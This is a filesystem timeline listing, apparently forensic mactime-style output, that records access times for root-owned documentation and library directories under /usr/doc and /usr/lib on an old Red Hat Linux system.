                       4096 .a. drwxr-xr-x root     root     /usr/doc/glib-1.2.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/glibc-2.1.3

                       4096 .a. drwxr-xr-x root     root     /usr/doc/glibc-2.1.3/examples.threads

                       4096 .a. drwxr-xr-x root     root     /usr/doc/gnupg-1.0.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/grep-2.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/gzip-1.2.4a

                       4096 .a. drwxr-xr-x root     root     /usr/doc/hdparm-3.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/initscripts-5.00

                       4096 .a. drwxr-xr-x root     root     /usr/doc/inn-2.2.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/inn-2.2.2/faq

                       4096 .a. drwxr-xr-x root     root     /usr/doc/inn-2.2.2/samples

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ipchains-1.3.9

                       4096 .a. drwxr-xr-x root     root     /usr/doc/iputils-20000121

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ipxutils-2.2.0.17

                       4096 .a. drwxr-xr-x root     root     /usr/doc/isapnptools-1.21b

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ispell-3.1.20

                       4096 .a. drwxr-xr-x root     root     /usr/doc/jade-1.2.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/jade-1.2.1/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/jade-1.2.1/dsssl

                       4096 .a. drwxr-xr-x root     root     /usr/doc/jade-1.2.1/jadedoc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/jade-1.2.1/pubtext

                       4096 .a. drwxr-xr-x root     root     /usr/doc/jade-1.2.1/unicode

                       4096 .a. drwxr-xr-x root     root     /usr/doc/kernel-pcmcia-cs-2.2.14

                       4096 .a. drwxr-xr-x root     root     /usr/doc/kernel-utils-2.2.14

                       4096 .a. drwxr-xr-x root     root     /usr/doc/krb5-devel-1.1.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/krb5-devel-1.1.1/api

                       4096 .a. drwxr-xr-x root     root     /usr/doc/krb5-devel-1.1.1/implement

                       4096 .a. drwxr-xr-x root     root     /usr/doc/krb5-devel-1.1.1/kadm5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/krb5-devel-1.1.1/kadmin

                       4096 .a. drwxr-xr-x root     root     /usr/doc/krb5-devel-1.1.1/krb5-protocol

                       4096 .a. drwxr-xr-x root     root     /usr/doc/krb5-devel-1.1.1/rpc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/kudzu-0.36

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ldconfig-1.9.5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libjpeg-6b

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libjpeg-devel-6b

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libpng-1.0.5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libtiff-devel-3.5.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libtiff-devel-3.5.4/images

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libtiff-devel-3.5.4/images/CVS

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libtiff-devel-3.5.4/man

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libtiff-devel-3.5.4/man/CVS

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libtool-1.3.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libtool-1.3.4/demo

                       4096 .a. drwxr-xr-x root     root     /usr/doc/libungif-devel-4.1.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lilo-0.21

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lilo-0.21/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/linuxconf-1.17r2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lsof-4.47

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ltrace-0.3.10

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lynx-2.8.3

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lynx-2.8.3/docs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lynx-2.8.3/lynx_help

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lynx-2.8.3/lynx_help/keystrokes

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lynx-2.8.3/samples

                       4096 .a. drwxr-xr-x root     root     /usr/doc/lynx-2.8.3/test

                       4096 .a. drwxr-xr-x root     root     /usr/doc/m4-1.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/man-pages-1.28

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mars-nwe-0.99pl17

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mars-nwe-0.99pl17/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mars-nwe-0.99pl17/examples

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mingetty-0.9.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/minicom-1.83.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/minicom-1.83.0/demos

                       4096 .a. drwxr-xr-x root     root     /usr/doc/minicom-1.83.0/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/minicom-1.83.0/tables

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mod_perl-1.21

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mod_perl-1.21/eg

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mod_perl-1.21/faq

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mpage-2.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mt-st-0.5b

                       4096 .a. drwxr-xr-x root     root     /usr/doc/mutt-1.0.1i

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncftp-3.0beta21

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncftp-3.0beta21/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncftp-3.0beta21/doc/html

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncftp-3.0beta21/doc/man

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncompress-4.2.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncpfs-2.2.0.17

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncurses-5.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncurses-devel-5.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncurses-devel-5.0/c++

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ncurses-devel-5.0/test

                       4096 .a. drwxr-xr-x root     root     /usr/doc/newt-0.50.8

                       4096 .a. drwxr-xr-x root     root     /usr/doc/newt-devel-0.50.8

                       4096 .a. drwxr-xr-x root     root     /usr/doc/nmh-1.0.3

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pam-0.72

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pam-0.72/html

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pam-0.72/ps

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pam-0.72/txts

                       4096 .a. drwxr-xr-x root     root     /usr/doc/patch-2.5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pciutils-2.1.5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/php-3.0.15

                       4096 .a. drwxr-xr-x root     root     /usr/doc/php-3.0.15/examples

                       4096 .a. drwxr-xr-x root     root     /usr/doc/php-3.0.15/examples/album

                       4096 .a. drwxr-xr-x root     root     /usr/doc/php-3.0.15/examples/album/include

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pidentd-3.0.10

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/bitmaps

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/bitmaps/unixware

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/carmel

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/carmel/c-client

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/carmel/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/carmel/imapd

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/carmel/pine

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/flag.cc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/keypad.enable

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/ports

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/ports/aos

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/ports/vms

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/contrib/utils

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pine-4.21/tech-notes

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pmake-2.1.34

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pmake-2.1.34/etc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pmake-2.1.34/etc/bench

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pmake-2.1.34/etc/gnumake

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pmake-2.1.34/tests

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pnm2ppa-0.8.9pre1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pnm2ppa-0.8.9pre1/pbm2ppa

                       4096 .a. drwxr-xr-x root     root     /usr/doc/portmap-4.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/admin

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/apache_logging

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/array

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/datetime

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/earthdistance

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/findoidjoins

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/fulltextindex

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/int8

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/isbn_issn

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/linux

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/lo

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/mSQL-interface

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/miscutil

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/noupdate

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/pginterface

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/soundex

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/spi

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/spi/preprocessor

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/string

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/tools

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/unixdate

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/userlock

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/contrib/vacuumlo

                      12288 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/postgres

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/programmer

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/tutorial

                       4096 .a. drwxr-xr-x root     root     /usr/doc/postgresql-6.5.3/user

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ppp-2.3.11

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ppp-2.3.11/sample

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ppp-2.3.11/scripts

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ppp-2.3.11/scripts/chatchat

                       4096 .a. drwxr-xr-x root     root     /usr/doc/procmail-3.14

                       4096 .a. drwxr-xr-x root     root     /usr/doc/procmail-3.14/examples

                       4096 .a. drwxr-xr-x root     root     /usr/doc/procps-2.0.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pwdb-0.61

                       4096 .a. drwxr-xr-x root     root     /usr/doc/pwdb-0.61/html

                       4096 .a. drwxr-xr-x root     root     /usr/doc/raidtools-0.90

                       4096 .a. drwxr-xr-x root     root     /usr/doc/rcs-5.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/rdist-6.1.5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/rhs-printfilters-1.63

                       4096 .a. drwxr-xr-x root     root     /usr/doc/rpm-3.0.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/rsync-2.4.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/docs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/docs/faq

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/docs/htmldocs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/docs/manpages

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/docs/textdocs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/docs/yodldocs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/autofs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/dce-dfs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/misc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/printer-accounting

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/printing

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/simple

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/svr4-startup

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/thoralf

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/tridge

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/validchars

                       4096 .a. drwxr-xr-x root     root     /usr/doc/samba-2.0.6/examples/wins_hook

                       4096 .a. drwxr-xr-x root     root     /usr/doc/sed-3.02

                       4096 .a. drwxr-xr-x root     root     /usr/doc/setserial-2.15

                       4096 .a. drwxr-xr-x root     root     /usr/doc/sgml-tools

                       4096 .a. drwxr-xr-x root     root     /usr/doc/sgml-tools/html

                       4096 .a. drwxr-xr-x root     root     /usr/doc/sgml-tools/rtf

                       4096 .a. drwxr-xr-x root     root     /usr/doc/sh-utils-2.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/shadow-utils-19990827

                       4096 .a. drwxr-xr-x root     root     /usr/doc/shapecfg-2.2.12

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2/doc/OLD

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2/doc/OLD/help

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2/doc/internal

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2/doc/text

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2/doc/tm

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slang-devel-1.2.2/doc/tm/tools

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slocate-2.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/slrn-0.9.6.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/svgalib-1.4.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/sysklogd-1.3.31

                       4096 .a. drwxr-xr-x root     root     /usr/doc/tcp_wrappers-7.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/tcpdump-3.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/tcsh-6.09

                       4096 .a. drwxr-xr-x root     root     /usr/doc/texinfo-4.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/textutils-2.0a

                       4096 .a. drwxr-xr-x root     root     /usr/doc/time-1.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/tin-1.4.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/tin-1.4.2/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/trn-3.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ucd-snmp-4.1.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ucd-snmp-4.1.1/local

                       4096 .a. drwxr-xr-x root     root     /usr/doc/urlview-0.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/utempter-0.5.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/util-linux-2.10f

                       4096 .a. drwxr-xr-x root     root     /usr/doc/uucp-1.06.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/uucp-1.06.1/contrib

                       4096 .a. drwxr-xr-x root     root     /usr/doc/uucp-1.06.1/sample

                       4096 .a. drwxr-xr-x root     root     /usr/doc/vim-common-5.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/vim-common-5.6/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/vim-common-5.6/syntax

                       4096 .a. drwxr-xr-x root     root     /usr/doc/vim-common-5.6/tutor

                       4096 .a. drwxr-xr-x root     root     /usr/doc/which-2.9

                       4096 .a. drwxr-xr-x root     root     /usr/doc/words-2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/yp-tools-2.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ypbind-3.3

                       4096 .a. drwxr-xr-x root     root     /usr/doc/zlib-devel-1.1.3

                       4096 .a. drwxr-xr-x root     root     /usr/lib/apache

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/i386

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/i86

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/arch

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/asm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/bsd

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/bsd/sys

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/generic

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/linux

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/linuxmt

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/msdos

                       4096 .a. drwxr-xr-x root     root     /usr/lib/bcc/include/sys

                       4096 .a. drwxr-xr-x root     root     /usr/lib/cvs

                       4096 .a. drwxr-xr-x root     root     /usr/lib/cvs/contrib

                       4096 .a. drwxr-xr-x root     root     /usr/lib/elm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/emacs/20.5

                       4096 .a. drwxr-xr-x root     root     /usr/lib/emacs/20.5/i386-redhat-linux-gnu

                       4096 .a. drwxr-xr-x root     root     /usr/lib/emacs/site-lisp

                       4096 .a. drwxr-xr-x root     root     /usr/lib/entity-map

                       4096 .a. drwxr-xr-x root     root     /usr/lib/entity-map/0.1.0

                       4096 .a. drwxr-xr-x root     root     /usr/lib/games

                       4096 .a. drwxr-xr-x root     root     /usr/lib/gcc-lib

                       4096 .a. drwxr-xr-x root     root     /usr/lib/gcc-lib/i386-redhat-linux

                       4096 .a. drwxr-xr-x root     root     /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66

                       4096 .a. drwxr-xr-x root     root     /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/include

                       4096 .a. drwxr-xr-x root     root     /usr/lib/gconv

                       4096 .a. drwxr-xr-x root     root     /usr/lib/getopt

                       4096 .a. drwxr-xr-x root     root     /usr/lib/gnupg

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devX100

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devX100-12

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devX75

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devX75-12

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devascii

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devdvi

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devdvi/generate

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devhtml

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devlatin1

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devlj4

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devlj4/generate

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devps

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/font/devps/generate

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/tmac

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/tmac/mdoc

                       4096 .a. drwxr-xr-x root     root     /usr/lib/groff/tmac/mm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/ispell

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/consolefonts

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/consoletrans

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/amiga

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/atari

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/i386

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/i386/azerty

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/i386/dvorak

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/i386/fgGIod

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/i386/include

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/i386/qwerty

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/i386/qwertz

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/include

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/mac

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/keymaps/sun

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/unidata

                       4096 .a. drwxr-xr-x root     root     /usr/lib/kbd/videomodes

                       4096 .a. drwxr-xr-x root     root     /usr/lib/ldscripts

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/bg5

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/cn

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/cs

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/de

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/es

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/fi

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/fr

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/it

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/ko

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/no

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/pt

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/ro

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/se

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/sk

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/messages/sources

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf-devel/templates

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/descriptions

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/descriptions/eng

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/descriptions/es

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/descriptions/fr

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/descriptions/ko

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/descriptions/pt

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/descriptions/se

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/apache

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/askrunlevel

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/dhcpd

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/dialog

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/dialout

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/dnsconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/fetchmailconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/firewall

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/fstab

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/inetdconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/mailconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/main

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/managerpm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/misc

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/motd

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/mrtg

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/netadm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/netconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/notices

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/pppdialin

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/rarp

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/redhat

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/redhatppp

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/samba

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/squid

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/status

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/userconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/usermenu

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/uucp

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/wuftpd

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/help.eng/xconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/images

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/install

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/install/gnome

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/java

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/lib

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/mailconf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/modules

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/redhat/6.1

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/redhat/perm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/redhat/scripts

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/uninstall

                       4096 .a. drwxr-xr-x root     root     /usr/lib/linuxconf/uucp

